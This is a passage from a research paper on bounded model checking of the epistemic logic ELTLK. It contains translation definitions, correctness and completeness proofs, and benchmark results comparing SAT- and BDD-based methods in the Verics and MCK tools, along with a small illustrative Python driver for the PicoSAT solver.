&&\wedge \bigwedge \nolimits _{i=0}^{j-1}({\mathcal{B}}_i^{>}(u_{n}) \rightarrow [\psi _1]^{[i,n,{{h}_{k}^{\mathrm{U}}}(i)]}_{k})\wedge \bigwedge \nolimits _{i=m}^{k}[\psi _1]^{[i,n,{{h}_{k}^{\mathrm{U}}}(i)]}_{k})),\\
{[\psi _1 \mathrm{R}\psi _2]}^{[m,n,A]}_{k} &:=& \bigvee \nolimits _{j=m}^{k}([\psi _1]^{[j,n,{{h}_{k}^{\mathrm{R}}}(k+1)]}_{k} \wedge \bigwedge \nolimits _{i=m}^{j}[\psi _2]^{[i,n,{{h}_{k}^{\mathrm{R}}}(i)]}_{k})\\
&& \vee (\bigvee \nolimits _{l=0}^{m-1}({\mathcal{L}}_{k}^l({\varvec{\pi }}_{n}))\wedge \bigvee \nolimits _{j=0}^{m} ({\mathcal{B}}_j^{>}(u_n) \wedge [\psi _1]^{[j,n,{{h}_{k}^{\mathrm{R}}}(k+1)]}_{k}\\
&& \wedge \bigwedge \nolimits _{i=0}^{j-1}({\mathcal{B}}_i^{>}(u_{n}) \rightarrow [\psi _2]^{[i,n,{{h}_{k}^{\mathrm{R}}}(i)]}_{k}) \wedge \bigwedge \nolimits _{i=m}^{k}[\psi _2]^{[i,n,{{h}_{k}^{\mathrm{R}}}(i)]}_{k}))\\
&& \vee (\bigvee \nolimits _{l=0}^{k-1} ({\mathcal{L}}_{k}^{l}({\varvec{\pi }}_{n}))\wedge \bigwedge \nolimits _{j = 0}^{m-1}({\mathcal{B}}_j^{\geqslant }(u_{n}) \rightarrow [\psi _2]^{[j,n,{{h}_{k}^{\mathrm{R}}}(j)]}_{k})\\
&& \wedge \bigwedge \nolimits _{j = m}^{k} [\psi _2]^{[j,n,{{h}_{k}^{\mathrm{R}}}(j)]}_{k}),\\
{[{\overline{\mathrm{{K}}}}_{{ c}}\psi ]}^{[m,n,A]}_{k} &:=& I_{\iota }(w_{0,n'}) \wedge \bigvee \nolimits ^{k}_{j=0}([\psi ]^{[j,n',g_s(A)]}_{k} \wedge H_{{ c}}(w_{m,n},w_{j,n'})),\\
{[{\overline{\mathrm{{D}}}}_\varGamma \psi ]}^{[m,n,A]}_{k} &:=& I_{\iota }(w_{0, n'})\wedge \bigvee \nolimits _{j=0}^{k}([\psi ]^{[j,n',g_s(A)]}_{k} \wedge \bigwedge \nolimits _{{ c}\in \varGamma } H_{{ c}}(w_{m,n},w_{j,n'})),\\
{[{\overline{\mathrm{E}}}_\varGamma \psi ]}^{[m,n,A]}_{k} &:=& I_{\iota }(w_{0,n'}) \wedge \bigvee \nolimits _{j=0}^{k}([\psi ]^{[j,n',g_s(A)]}_{k} \wedge \bigvee \nolimits _{{ c}\in \varGamma } H_{{ c}}(w_{m,n},w_{j,n'})),\\
{[{\overline{\mathrm{{C}}}}_\varGamma \psi ]}^{[m,n,A]}_{k} &:=& [\bigvee \nolimits _{j=1}^{k} ({\overline{\mathrm{E}}}_\varGamma )^j\psi ]^{[m,n,A]}_k. \\
\end{array} \end{aligned}$$

For representing the propositional formula \([M,\varphi ]_{k}\), reduced Boolean circuits (RBCs) [1] are used. An RBC represents subformulae of \([M,\varphi ]_{k}\) by fresh propositions such that any two identical subformulae correspond to the same proposition.1 Following van der Meyden et al. [23], instead of using RBCs we could directly encode \([M,\varphi ]_{k}\) in such a way that each subformula \(\psi \) of \([M,\varphi ]_{k}\) occurring within the scope of a \(k\)-element disjunction or conjunction is replaced with a propositional variable \(p_{\psi }\), and the reduced formula \([M,\varphi ]_{k}\) is conjoined with the implication \(p_{\psi } \Rightarrow \psi \). However, in this case our method, like the one proposed in [23], would not be complete. Nonetheless, completeness can be achieved by using \(p_{\psi } \Leftrightarrow \psi \) instead of \(p_{\psi } \Rightarrow \psi \); this, however, can yield a formula of exponential size during the transformation into clausal normal form.2

Our encoding of the ELTLK formulae is defined recursively over the structure of an ELTLK formula \(\varphi \), over the current position \(m\) of the \(n\)-th symbolic \(k\)-path, and over the set \(A\) of symbolic \(k\)-paths, which is initially equal to \(F_k(\varphi )\). Next, our encoding does not translate looping and non-looping witnesses separately, but combines both of them. Further, it is parameterised by the bound \(k\) and the set of symbolic \(k\)-paths, and closely follows the bounded semantics of Def. 4. Therefore, for fixed \(n\), \(m\), \(k\), and \(A\), each subformula \(\psi \) of \(\varphi \) requires constraints of size \(O(k\cdot f_k(\varphi ))\) using the encoding of \(\psi \) at various positions. Moreover, since the encoding of a subformula \(\psi \) depends only on \(m\), \(n\), \(k\), and \(A\), multiple occurrences of the encoding of \(\psi \) over the same set of parameters can be shared, so the overall size can be bounded by \(O(|\varphi | \cdot k \cdot f_k(\varphi ))\). Further, the size of the formula \([M,\varphi ]_k\) is bounded by \(O(|T|\cdot k \cdot f_k(\varphi ) + |\varphi | \cdot k \cdot f_k(\varphi ))\).

3.2.4 Correctness and completeness of the translation

The lemmas below state the correctness and the completeness of the presented translation. Now, let \(\alpha \) be an ELTLK formula. For every ELTLK subformula \(\varphi \) of \(\alpha \), we denote by \([\varphi ]^{[\alpha ,m,n,A]}_{k}\) the propositional formula

$$\begin{aligned}{}[M]_k^{F_k(\alpha )}\wedge [\varphi ]^{[m,n,A]}_{k} \end{aligned}$$ (6)

where \([M]_k^{F_k(\alpha )} := \bigwedge _{j\in F_k(\alpha )} \bigwedge ^{k-1}_{i=0} {\mathcal{R}}(w_{i,j}, w_{i+1,j}) \wedge \bigwedge _{j\in F_k(\alpha )} \bigvee _{l=0}^{k} {\mathcal{B}}_l^{=}(u_{j})\). In the next two lemmas we use the following auxiliary notation. By \(V \Vdash \xi \) we mean that the valuation \(V\) satisfies the propositional formula \(\xi \). Moreover, we write \(g_{i,j}\) instead of \(\mathbf{S}(w_{i,j})\), and \(l_j\) instead of \(\mathbf{J}(u_j)\).

Lemma 7 (Correctness of the translation) Let \(M\) be a model, \(\alpha \) an ELTLK formula, and \(k \in \mathrm{I\!N}\).
For every subformula \(\varphi \) of the formula \(\alpha \), every \((m, n) \in \{0,\ldots ,k\} \times F_k(\alpha )\), every \(A \subseteq F_k(\alpha )\setminus \{n\}\) such that \(|A| = f_k(\varphi )\), and every valuation \(V\), the following condition holds: \(V \Vdash [\varphi ]^{[\alpha ,m,n,A]}_{k}\) implies \(M, ((g_{0,n},\ldots ,g_{k,n}), l_n)[m] \models _k \varphi \).

Proof Let \(n \in F_k(\alpha )\), let \(A\) be a set such that \(A \subseteq F_k(\alpha ) \setminus \{n\}\) and \(|A| = f_k(\varphi )\), let \(m\) be a natural number such that \(0 \leqslant m \leqslant k\), let \(\rho _l\) denote the \(k\)-path \(((g_{0,n},\ldots ,g_{k,n}), l_n)\), and let \(V\) be a valuation. Suppose that \(V \Vdash [\varphi ]^{[\alpha ,m,n,A]}_{k}\) and consider the following cases:

1. \(\varphi \in \{{{true}}, {false}\}\). The thesis of the lemma is obvious in this case.
2. \(\varphi = p\), where \(p \in \mathcal{PV }\). Then, \(V \Vdash [p]^{[\alpha ,m,n,A]}_{k} \iff V \Vdash p(w_{m,n}) \iff p \in {\mathcal{V }}(g_{m,n}) \iff M,\rho _l[m] \models _k p\).
3. \(\varphi = \lnot p\), where \(p \in \mathcal{PV }\). Then, \(V \Vdash [\lnot p]^{[\alpha ,m,n,A]}_{k} \iff V \Vdash \lnot p(w_{m,n}) \iff p \notin {\mathcal{V }}(g_{m,n}) \iff M,\rho _l[m] \models _k \lnot p\).
4. \(\varphi = \psi _1 \wedge \psi _2\). Let \(B = g_l(A,f_k(\psi _1))\) and \(C = g_r(A,f_k(\psi _2))\). From \(V \Vdash [\psi _1 \wedge \psi _2]^{[\alpha ,m,n,A]}_k\), we get \(V \Vdash [\psi _1]^{[\alpha ,m,n,B]}_k\) and \(V \Vdash [\psi _2]^{[\alpha ,m,n,C]}_k\). By the inductive hypotheses, \(M,\rho _l[m] \models _k \psi _1\) and \(M,\rho _l[m] \models _k \psi _2\). Thus \(M,\rho _l[m] \models _k \psi _1 \wedge \psi _2\).
5. \(\varphi = \psi _1 \vee \psi _2\). Let \(B = g_l(A,f_k(\psi _1))\) and \(C = g_l(A,f_k(\psi _2))\). From \(V \Vdash [\psi _1 \vee \psi _2]^{[\alpha ,m,n,A]}_k\), we get \(V \Vdash [\psi _1]^{[\alpha ,m,n,B]}_k\) or \(V \Vdash [\psi _2]^{[\alpha ,m,n,C]}_k\). By the inductive hypotheses, \(M,\rho _l[m] \models _k \psi _1\) or \(M,\rho _l[m] \models _k \psi _2\). Thus \(M,\rho _l[m] \models _k \psi _1 \vee \psi _2\).
6. \(\varphi = \mathrm{X}\psi \mid \psi _1 \mathrm{U}\psi _2 \mid \psi _1 \mathrm{R}\psi _2\). See Lemma 3.1 of [55].
7. \(\varphi ={\overline{\mathrm{{K}}}}_{{ c}} \psi \). Let \(n' = \min (A)\), and let \(\widetilde{\rho }_{l'}\) denote the \(k\)-path \(((g_{0,n'},\ldots ,g_{k,n'}), l_{n'})\). By the definition of the translation, \(V \Vdash [{\overline{\mathrm{{K}}}}_{{ c}} \psi ]^{[\alpha ,m,n,A]}_{k}\) implies \(V \Vdash I_{\iota }(w_{0,n'}) \wedge \bigvee ^{k}_{j=0}([\psi ]^{[\alpha ,j,n',g_s(A)]}_{k} \wedge H_{{ c}}(w_{m,n},w_{j,n'}))\). Since \(V \Vdash H_{{ c}}(w_{m,n},w_{j,n'})\), we have \(g_{m,n} \sim _{{ c}} g_{j,n'}\) for some \(j \in \{0,\ldots ,k\}\). Therefore, by the inductive hypotheses we get \((\exists 0 \leqslant j \leqslant k)\,(M,\widetilde{\rho }_{l'}[j] \models _k \psi \) and \(g_{m,n} \sim _{{ c}} g_{j,n'})\). Thus we have \(M, ((g_{0,n},\ldots ,g_{k,n}), l_n)[m] \models _k {\overline{\mathrm{{K}}}}_{{ c}} \psi \).
8. \(\varphi =\overline{Y}_{\varGamma }\psi \), where \(Y \in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}\). These cases can be proven analogously to case 7.

Let \(B\) and \(C\) be two finite sets of indices.
Then, by \(Var(B)\) we denote the set of all the state variables appearing in all the symbolic states of all the symbolic \(k\)-paths whose indices are taken from the set \(B\). Moreover, for every valuation \(V\) and every set of indices \(B\), by \(V\!\uparrow \!B\) we denote the restriction of the valuation \(V\) to the set \(Var(B)\). Notice that if \(B \cap C = \emptyset \), then \(Var(B) \cap Var(C) = \emptyset \). This property is used in the proof of the following lemma.

Lemma 8 (Completeness of the translation) Let \(M\) be a model, \(k \in \mathrm{I\!N}\), and \(\alpha \) an ELTLK formula such that \(f_k(\mathrm{E}\alpha ) > 0\). For every subformula \(\varphi \) of the formula \(\alpha \), every \((m, n) \in \{(0, 0)\} \cup \{0,\ldots ,k\} \times F_k(\alpha )\), every \(A \subseteq F_k(\alpha )\setminus \{n\}\) such that \(|A| = f_k(\varphi )\), and every \(k\)-path \(\rho _l\), the following condition holds: \(M, \rho _l[m] \models _k \varphi \) implies that there exists a valuation \(V\) such that \(\rho _l = ((g_{0,n},\ldots ,g_{k,n}), l_n)\) and \(V \Vdash [\varphi ]^{[\alpha ,m,n,A]}_{k}\).

Proof First, note that given an ELTLK formula \(\alpha \) and natural numbers \(k\), \(m\), \(n\) with \(0 \leqslant m \leqslant k\) and \(n \in F_k(\alpha )\), there exists a valuation \(V\) such that \(V \Vdash [M]_k^{F_k(\alpha )}\). This is because \(M\) has no terminal states. Now we proceed by induction on the complexity of \(\varphi \). Let \(n \in F_k(\alpha )\), let \(A\) be a set such that \(A \subseteq F_k(\alpha ) \setminus \{n\}\) and \(|A| = f_k(\varphi )\), let \(\rho _l\) be a \(k\)-path in \(M\), and let \(m\) be a natural number such that \(0 \leqslant m \leqslant k\). Suppose that \(M,\rho _l[m] \models _k \varphi \) and consider the following cases:

1. Let \(\varphi =p \mid \lnot p\mid \psi _1 \vee \psi _2 \mid \psi _1 \wedge \psi _2 \mid \mathrm{X}\psi \mid \psi _1 \mathrm{U}\psi _2 \mid \psi _1 \mathrm{R}\psi _2\) with \(p\in \mathcal{PV }\). See the proof of Lemma 3.3 of [55].
2. Let \(\varphi ={\overline{\mathrm{{K}}}}_{{ c}} \psi \). Since \(M,\rho _l[m] \models _k {\overline{\mathrm{{K}}}}_{{ c}}\psi \), we have that \((\exists \rho '_{l'} \in {\varPi _k}(\iota ))\,(\exists 0 \leqslant j \leqslant k)\,(M, \rho '_{l'}[j] \models _k \psi \) and \(\rho _l(m) \sim _{{ c}} \rho '_{l'}(j))\). Let \(n' = \min (A)\) and \(B = g_s(A)\). By the inductive hypothesis and the definition of the formula \(H_{{ c}}\), there exists a valuation \(V'\) such that \(V' \Vdash [M]_k^{F_k(\alpha )}\) and \(V' \Vdash [\psi ]^{[j,n',B]}_k \wedge H_{{ c}}(w_{m,n},w_{j,n'})\) for some \(j \in \{0,\ldots ,k\}\). Hence we have \(V' \Vdash \bigvee ^{k}_{j=0}([\psi ]^{[j,n',B]}_k \wedge H_{{ c}}(w_{m,n},w_{j,n'}))\). Further, since \(\rho '_{l'} \in {\varPi _k}(\iota )\), we have \(\rho '_{l'}(0)=\iota \). Thus, by the definition of the formula \(I\), we get that \(V' \Vdash I_{\iota }(w_{0,n'})\). Therefore we have \(V' \Vdash I_{\iota }(w_{0,n'}) \wedge \bigvee ^{k}_{j=0}([\psi ]^{[j,n',B]}_k \wedge H_{{ c}}(w_{m,n},w_{j,n'}))\), which implies that \(V' \Vdash {[{\overline{\mathrm{{K}}}}_{{ c}}\psi ]}^{[m,n,A]}_{k}\). Since \(n' \notin B\) and \(n \notin A\), there exists a valuation \(V\) such that \(V\!\uparrow \!B = V'\!\uparrow \!B\), and moreover \(V \Vdash [M]_k^{F_k(\alpha )}\) and \(V \Vdash {[{\overline{\mathrm{{K}}}}_{{ c}}\psi ]}^{[m,n,A]}_{k}\).
Therefore we get \(V \Vdash [{\overline{\mathrm{{K}}}}_{{ c}}\psi ]^{[\alpha ,m,n,A]}_k\).

3. Let \(\varphi =\overline{Y}_{\varGamma }\psi \), where \(Y \in \{ \mathrm{{D}},\mathrm{E},\mathrm{{C}}\}\). These cases can be proven analogously to case 2.

The correctness of the SAT-based translation scheme for ELTLK is guaranteed by the following theorem.

Theorem 2 Let \(M\) be a model, and \(\varphi \) an ELTLK formula. Then for every \(k \in \mathrm{I\!N}\), \(M \models ^{\exists }_k \varphi \) if, and only if, the propositional formula \([M,\varphi ]_{k}\) is satisfiable.

Proof \((\Longrightarrow )\) Let \(k \in \mathrm{I\!N}\) and \(M, \rho _l \models _k \varphi \) for some \(\rho _l \in \varPi _k(\iota )\). By Lemma 8 it follows that there exists a valuation \(V\) such that \(\rho _l = ((g_{0,0},\ldots ,g_{k,0}), l_0)\) with \({\mathbf{S}}(w_{0,0}) = g_{0,0}=\iota \) and \(V \Vdash [\varphi ]^{[\varphi ,0,0,F_k(\varphi )]}_{k}\). Hence, \(V \Vdash I(w_{0,0})\wedge [M]_{k}^{F_k(\varphi )} \wedge {[\varphi ]}^{[0,0,F_k(\varphi )]}_{k}\). Thus \(V \Vdash [M,\varphi ]_k\).

\((\Longleftarrow )\) Let \(k \in \mathrm{I\!N}\) and let \([M,\varphi ]_k\) be satisfiable. This means that there exists a valuation \(V\) such that \(V \Vdash [M,\varphi ]_k\). So, \(V \Vdash I(w_{0,0})\) and \(V \Vdash [M]_k^{F_k(\varphi )} \wedge {[\varphi ]}^{[0,0,F_k(\varphi )]}_{k}\). Hence, by Lemma 7 it follows that \(M, ((g_{0,0},\ldots ,g_{k,0}), l_0) \models _k \varphi \) and \({\mathbf{S}}(w_{0,0}) = g_{0,0} = \iota \). Thus \(M \models ^{\exists }_k \varphi \).

4 Experimental results

In this section we experimentally evaluate the performance of our four different BMC encodings: two SAT-based BMC (over the IIS and IS semantics) and two BDD-based BMC (over the IIS and IS semantics), all implemented as extensions of our tool Verics [28], so the inputs to the four algorithms are the same. We compare our experimental results with those of the MCK tool (version 0.5.1),3 the only existing tool that is suitable with respect to the input formalism (i.e., interpreted systems) and the checked properties (i.e., ELTLK). We have done our best to compare our BMC approaches and the SAT-based BMC module of MCK on the same models. We would like to point out that the manual for MCK states that the tool supports SAT-based BMC for \(\mathrm{ECTL}^{*}\mathrm{K}\) (i.e., \(\mathrm{ECTL}^{*}\) augmented to include epistemic components). Unfortunately, no theory behind this implementation has ever been published. We are aware of the paper [23], which describes SAT-based BMC for ECTLK, but it does not discuss how this approach can be extended to \(\mathrm{ECTL}^{*}\mathrm{K}\). Therefore, we are unable to compare our SAT-based BMC algorithms for ELTLK with the one for \(\mathrm{ECTL}^{*}\mathrm{K}\) implemented in MCK. We have conducted the experiments using two classical multi-agent protocols, the (faulty) train controller system and the dining cryptographers protocol, and one benchmark that is not yet so popular in the multi-agent community, i.e., the (faulty) generic pipeline paradigm. However, we would like to point out that (F)GPP is a very useful and scalable example, which has the potential to become a standard benchmark in this community.
Further, we specify each property for the considered benchmarks in the universal form by an LTLK formula, for which we verify the corresponding counterexample formula, i.e., the negated universal formula in ELTLK, which is interpreted existentially. Moreover, for every specification given there exists a counterexample, i.e., the ELTLK formula specifying the counterexample holds in the model of the benchmark. We have computed our experimental results on a computer with an Intel Xeon 2 GHz processor and 4 GB of RAM, running Linux 2.6, with the default limits of 2 GB of memory and 2000 seconds. Moreover, similarly to the MCK tool, we used PicoSAT [2] to test the satisfiability of the propositional formulae generated by our SAT-based BMC encodings; our SAT-based implementation uses PicoSAT version 957. The implementation of the BDD-based method employs the CUDD 2.5.0 [44] library for operations on BDDs.

The first benchmark we have considered is the faulty train controller system (FTC); see Sect. 2.4 for the description of the model. This system is scaled according to the number of trains (agents), i.e., the problem parameter \(n\) is the number of trains. The specifications (universal formulae) we consider are as follows:

• \(\varphi _1\) = \(\mathrm{G}(InTunnel_1 \rightarrow \mathrm{{K}}_{Train_1} (\bigwedge _{i=2}^n \lnot InTunnel_i) )\) – it expresses that whenever the first train is in the tunnel, it knows that no other train is in the tunnel,
• \(\varphi _2\) = \(\mathrm{G}(\mathrm{{K}}_{Train_1}\bigwedge _{i=1,j=2, i<j}^n \lnot (InTunnel_i \wedge InTunnel_j))\) – it represents that the trains are aware of the mutually exclusive access to the tunnel.

The size of the reachable state space of the FTC system is \(3\cdot (n+1)\cdot 2^{n-2}\), for \(n \geqslant 2\). The sizes of the counterexamples for the above formulae, for all our BMC methods as well as for MCK, are shown in Table 3. We would like to point out that in the case of the SAT-based BMC, by size we mean the length of the \(k\)-path in the counterexample (i.e., the value \(k\)) multiplied by the number of \(k\)-paths (i.e., the value of the function \(\widehat{f}_k\)). In the case of the BDD-based BMC, by size we mean the number of full iterations needed to find the counterexample. In Tables 3, 4, and 5 we denote by IS-k and IIS-k, respectively, the minimal value of the bound in BMC that yields a counterexample for the IS and the IIS semantics.

Table 3 The FTC system with \(n\) trains

Formula | Verics SAT-BMC: IS-k | IIS-k | \(\widehat{f}_k\) | Verics BDD-BMC: IS-k | IIS-k | MCK SAT-BMC: IS
\(\varphi _1\) | 2 | 4 | 2 | 2 | 4 | 3
\(\varphi _2\) | 2 | 4 | 2 | 2 | 4 | 3

Table 4 The FGPP system with \(n\) nodes

Formula | Verics SAT-BMC: IS-k | IIS-k | \(\widehat{f}_k\) | Verics BDD-BMC: IS-k | IIS-k | MCK SAT-BMC: IS
\(\varphi _1\) | \(2n+2\) | \(2n+2\) | 3 | \(2n+2\) | \(2n+2\) | \(6n+4\)
\(\varphi _2\) | \(2n+2\) | \(2n+4\) | 1 | \(2n+1\) | \(2n+3\) | \(6n-1\)
\(\varphi _3\) | 4 | 6 | 1 | 3 | 5 | 8
\(\varphi _4\) | 4 | 6 | 2 | 3 | 5 | 5

Table 5 The DC system with \(n\) cryptographers

Formula | Verics SAT-BMC: IS-k | IIS-k | \(\widehat{f}_k\) | Verics BDD-BMC: IS-k | IIS-k | MCK SAT-BMC: IS
\(\varphi _1\) | \(n+4\) | \(4n+1\) | \(n\) | \(n+4\) | \(4n+1\) | 7
\(\varphi _2\) | 0 | 0 | 2 | 2 | \(4n+1\) | 1
\(\varphi _3\) | \(n+4\) | \(4n+1\) | \(n+1\) | \(n+4\) | \(4n+1\) | 7

The second benchmark we have considered is the faulty generic pipeline paradigm (FGPP); see Sect. 2.4 for the description of the model. This system is scaled according to the number of its Nodes (agents), i.e., the problem parameter \(n\) is the number of Nodes.
The specifications (universal formulae) we consider are as follows:

• \(\varphi _1\) = \(\mathrm{G}(ProdSend \rightarrow \mathrm{{K}}_{C} \mathrm{{K}}_{P} ConsReady)\) – it states that if Producer produces a commodity, then Consumer knows that Producer knows that Consumer has not received the commodity.
• \(\varphi _2\) = \(\mathrm{G}(Problem_n \rightarrow (\mathrm{F}Repair_n \vee \mathrm{G}Alarm_nSend ))\) – it expresses that each time a problem occurs at node \(n\), either it is repaired or the alarm of node \(n\) is enabled.
• \(\varphi _3\) = \(\bigwedge _{i=1}^n\mathrm{G}(Problem_i \rightarrow (\mathrm{F}Repair_i \vee \mathrm{G}Alarm_iSend ))\) – it expresses that each time a problem occurs at a node, either it is repaired or the alarm is on.
• \(\varphi _4\) = \(\bigwedge _{i=1}^n\mathrm{G}\mathrm{{K}}_{P}(Problem_i \rightarrow (\mathrm{F}Repair_i \vee \mathrm{G}Alarm_iSend))\) – it expresses that Producer knows that each time a problem occurs at a node, either it is repaired or the alarm is on.

The size of the reachable state space of the FGPP system is \(4\cdot 3^{2n}\), for \(n \geqslant 1\). The sizes of the counterexamples for the above formulae, for all our BMC methods as well as for MCK, are shown in Table 4.

The third benchmark we have considered is the dining cryptographers protocol (DC); see Sect. 2.4 for the description of the model. This system is scaled according to the number of cryptographers, i.e., the problem parameter \(n\) is the number of cryptographers (together with the coins and the oracles). The specifications (universal formulae) we consider are as follows:

• \(\varphi _1\) = \(\mathrm{G}(odd \wedge \lnot paid_1 \rightarrow \bigvee _{i=2}^n\mathrm{{K}}_1({paid}_i))\) – it expresses that always when the number of uttered differences is odd and the first cryptographer has not paid for dinner, he knows which cryptographer has.
• \(\varphi _2\) = \(\mathrm{G}(\lnot paid_1 \rightarrow \mathrm{{K}}_1(\bigvee _{i=2}^n {paid}_i))\) – it states that it is always true that if the first cryptographer has not paid for dinner, then he knows that some other cryptographer has.
• \(\varphi _3\) = \(\mathrm{G}(odd \rightarrow \mathrm{{C}}_{\{ 1,\ldots ,n \}}\lnot (\bigvee _{i=1}^n {paid}_i))\) – it states that always when the number of uttered differences is odd, then it is common knowledge of all the cryptographers that none of the cryptographers has paid for dinner.

The size of the reachable state space of the system is \(3^n + (n + 1) \cdot 2^n \cdot (n + 1 + \sum _{k = 1}^{n} 2 \cdot 3^{n - k} \cdot k )\) for \(n \geqslant 3\). The sizes of the counterexamples for the above formulae, for all our BMC methods as well as for MCK, are shown in Table 5.

4.1 Performance evaluation

The experimental results show that the SAT-based BMC with the IS semantics outperforms the SAT-based BMC with the IIS semantics in both memory consumption and execution time (as shown below in the line charts), but for the BDD-based BMC it is the other way around. The reason for this is that the SAT-based BMC with the IS semantics produces a significantly smaller set of clauses (as shown in Table 6), and the SAT solver is given this smaller set. Moreover, the set of clauses produced by the SAT-based BMC with the IS semantics is not only smaller, but also 'easier' for the SAT solver, which further boosts the performance of the SAT-based BMC method with the IS semantics.
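As a note on the toolchain, the propositional formulae produced by a SAT-based encoding are typically handed to a solver such as PicoSAT in DIMACS CNF form. The following driver is a hypothetical sketch and not the Verics implementation; it assumes a picosat binary on the PATH and relies on the standard SAT-competition exit-code convention (10 for satisfiable, 20 for unsatisfiable), which PicoSAT follows:

    import subprocess
    import tempfile

    def is_satisfiable(clauses, num_vars):
        """Write a DIMACS CNF file and run the 'picosat' binary on it.
        Exit code 10 means satisfiable, 20 means unsatisfiable."""
        with tempfile.NamedTemporaryFile("w", suffix=".cnf", delete=False) as f:
            f.write(f"p cnf {num_vars} {len(clauses)}\n")
            for clause in clauses:
                f.write(" ".join(map(str, clause)) + " 0\n")
            path = f.name
        result = subprocess.run(["picosat", path], capture_output=True)
        return result.returncode == 10

    # (x1 or not x2) and x2 -- satisfiable with x1 = x2 = true
    print(is_satisfiable([[1, -2], [2]], 2))

A satisfiable result at bound \(k\) corresponds to a counterexample of that length; otherwise the bound is increased and the encoding regenerated.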
The reason for the inferiority of the BDD-based BMC with the IS semantics in all of our results most likely follows from the fact that in the IS semantics the BDD-based approach is faced with larger sets of successors in each iteration, compared to the IIS case.

Table 6 Results for selected witnesses generated by the SAT-based BMC translations

Formula | Semantics | \((\text {Max}^\triangledown )\) nr of components | Length of the witness | Nr of paths | Nr of variables | Nr of clauses

Faulty train controller
\(\varphi _1\) | IIS | \(650^\triangledown \) | 4 | 2 | 619982 | 1677373
\(\varphi _1\) | IS | 650 | 2 | 2 | 250690 | 618440
\(\varphi _1\) | IS | \(5500^\triangledown \) | 2 | 2 | 2564618 | 6262036
\(\varphi _2\) | IIS | \(450^\triangledown \) | 4 | 2 | 937878 | 2687061
\(\varphi _2\) | IS | 450 | 2 | 2 | 473350 | 1331220
\(\varphi _2\) | IS | \(1800^\triangledown \) | 2 | 2 | 5623947 | 16452621

Faulty generic pipeline paradigm
\(\varphi _1\) | IIS | \(30^\triangledown \) | 62 | 3 | 1024009 | 2869312
\(\varphi _1\) | IS | 30 | 62 | 3 | 844630 | 2257822
\(\varphi _1\) | IS | \(40^\triangledown \) | 82 | 3 | 1476472 | 3919425
\(\varphi _2\) | IIS | \(35^\triangledown \) | 74 | 1 | 517280 | 1449202
\(\varphi _2\) | IS | 35 | 72 | 1 | 390327 | 1044692
\(\varphi _2\) | IS | \(55^\triangledown \) | 112 | 1 | 979275 | 2608936
\(\varphi _3\) | IIS | \(1200^\triangledown \) | 6 | 1 | 1647007 | 4261015
\(\varphi _3\) | IS | 1200 | 6 | 1 | 2100292 | 5772169
\(\varphi _3\) | IS | \(1300^\triangledown \) | 6 | 1 | 1838281 | 4771037
\(\varphi _4\) | IIS | \(1100^\triangledown \) | 6 | 2 | 3886556 | 10690351
\(\varphi _4\) | IS | 1100 | 6 | 2 | 3033586 | 7868443
\(\varphi _4\) | IS | \(1200^\triangledown \) | 6 | 2 | 3253362 | 8400171

Dining cryptographers
\(\varphi _1\) | IIS | \(6^\triangledown \) | 25 | 6 | 551041 | 1639542
\(\varphi _1\) | IS | 6 | 9 | 6 | 122437 | 348178
\(\varphi _1\) | IS | \(16^\triangledown \) | 19 | 16 | 2473680 | 7083283
\(\varphi _2\) | IIS | \(2300^\triangledown \) | 0 | 2 | 508521 | 793923
\(\varphi _2\) | IS | 2300 | 0 | 2 | 80601 | 131343
\(\varphi _2\) | IS | \(2350^\triangledown \) | 0 | 2 | 82351 | 134193
\(\varphi _3\) | IIS | \(5^\triangledown \) | 21 | 22 | 2014710 | 6344695
\(\varphi _3\) | IS | 5 | 9 | 10 | 267628 | 805315
\(\varphi _3\) | IS | \(11^\triangledown \) | 15 | 16 | 2167850 | 6635325

As one can see from the line charts for the FTC system, in the case of this benchmark over the IIS semantics the BDD-based BMC performs much better in terms of the total time and the memory consumption for the formula \(\varphi _1\). More precisely, within the time limit set for the benchmarks, the BDD-based BMC is able to verify the formula \(\varphi _1\) for 2,500 trains, while the SAT-based BMC can handle only 650 trains. For \(\varphi _2\) the BDD-based BMC is still more efficient: it is able to verify 1,700 trains, whereas the SAT-based BMC verifies only 450 trains. However, in the case of the IS semantics the SAT-based BMC is superior to the BDD-based BMC for all the tested formulae. Namely, within the set time limit, the SAT-based BMC is able to verify the formula \(\varphi _1\) for 5,500 trains, while the BDD-based BMC can handle only 16 trains. Similarly, in the case of the formula \(\varphi _2\) the SAT-based BMC is able to verify 1,800 trains, while the BDD-based BMC computes the results for only 16 trains. As one can see from the line charts for the FGPP system, in the case of this benchmark over the IIS semantics the SAT-based BMC performs much better in terms of the total time and the memory consumption for the formulae \(\varphi _2\), \(\varphi _3\), and \(\varphi _4\), but it is worse for the formula \(\varphi _1\).
More precisely, within the set time limit, the SAT-based BMC is able to verify the formulae \(\varphi _2\), \(\varphi _3\), and \(\varphi _4\), respectively, for 35, 1200, and 1100 nodes, while the BDD-based BMC computes the results, respectively, for only 30, 10, and 600 nodes. In the case of the formula \(\varphi _1\) the BDD-based BMC is able to verify the formula for 40 nodes, whereas the SAT-based BMC can verify this formula for only 30 nodes. Here, the reason for the higher efficiency of the BDD-based BMC is the presence of the knowledge operator, which causes the partitioning of the problem into several smaller ELTL verification problems; these are handled much better by the operations on BDDs. The reason for the higher efficiency of the SAT-based BMC for the formulae \(\varphi _2\) and \(\varphi _3\) is the translation, which uses only one symbolic \(k\)-path, whereas the higher efficiency for the formula \(\varphi _4\) results from the constant length of the counterexample. As far as the FGPP system under the IS semantics is considered, the SAT-based BMC is superior to the BDD-based BMC for all the tested formulae. Namely, within the set time limit, the SAT-based BMC is able to verify the formulae \(\varphi _1\), \(\varphi _2\), \(\varphi _3\), and \(\varphi _4\), respectively, for 40, 55, 1300, and 1200 nodes, while the BDD-based BMC computes the results, respectively, for only 6, 5, 9, and 13 nodes.

As one can see from the line charts for the DC system, in the case of this benchmark over the IIS semantics the BDD-based approach significantly outperforms the SAT-based BMC for the formulae \(\varphi _1\) and \(\varphi _3\), but for the formula \(\varphi _2\) it is the other way around. Namely, within the set time limit, the BDD-based BMC is able to verify the formulae \(\varphi _1\) and \(\varphi _3\) for 12 cryptographers, while the SAT-based BMC computes the results, respectively, for only 6 and 5 cryptographers. In the case of the formula \(\varphi _2\) the SAT-based BMC computes the results for 2,300 cryptographers, whereas the BDD-based BMC handles only 15. For the formulae \(\varphi _1\) and \(\varphi _3\) the reason for the higher efficiency of the BDD-based BMC is that the SAT-based BMC deals with a huge number of symbolic \(k\)-paths. In the case of \(\varphi _1\) this number results from the fact that \(\varphi _1\) contains a 